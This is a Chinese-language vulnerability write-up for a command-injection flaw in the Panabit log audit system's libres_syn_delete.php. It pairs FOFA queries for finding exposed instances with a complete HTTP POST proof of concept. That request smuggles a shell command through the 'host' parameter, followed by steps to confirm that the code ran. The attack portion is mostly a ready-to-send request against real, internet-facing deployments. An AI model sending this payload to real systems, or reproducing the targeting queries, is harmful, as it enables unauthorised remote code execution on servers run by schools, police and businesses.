0x01
产品简介
Panabit日志审计系统是一款专门设计用来收集并处理用户所有网络活动的日志数据,包括会话数据、事件数据和身份数据。该系统不仅将大数据采集、大数据分析以及大数据整合应用于公安、高校、政企等行业的日志留存中,还支持对用户上网行为进行审计。
0x02
漏洞描述
该系统 libres_syn_delete.php 文件存在代码执行漏洞,可以执行任意代码
0x03
影响版本
影响版本: <= MARS r10p1Free 影响范围:1.2w-1.4w
访问:/cretime.txt 文件可查看版本.0x04
Fofa资产测绘
body="对不起,您的日志系统时间和您的流控系统时间相差超过30分钟,请核对!"
body="Maintain/cloud_index.php"
body="js/pad-zeropadding.js" && category="日志分析与审计"
其余语法自寻研究0x05
测绘结果
0x06
漏洞POC
POST /content-apply/libres_syn_delete.php HTTP/1.1
Host: ***.***.***.***:****
Cache-Control: max-age=0
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
token=10&id=10&host=;echo id >123.txt0x07
漏洞复现
回显{“yn”:“yes”,“str”:“OK”},则表示代码执行成功
测试执行id命令并且输出到当前路径下的123.txt文件中
查看生成的txt文件,发现执行的命令回显内容成功写入
本文来源于法克安全-菜鸡